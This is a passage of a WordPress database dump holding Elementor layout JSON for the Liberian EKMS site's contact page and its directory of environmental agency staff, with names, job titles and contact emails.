href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24476,3612,'_elementor_edit_mode','builder'),(24477,3612,'_elementor_template_type','wp-page'),(24478,3612,'_elementor_version','3.0.16'),(24479,3612,'_wp_page_template','default'),(24480,3612,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br 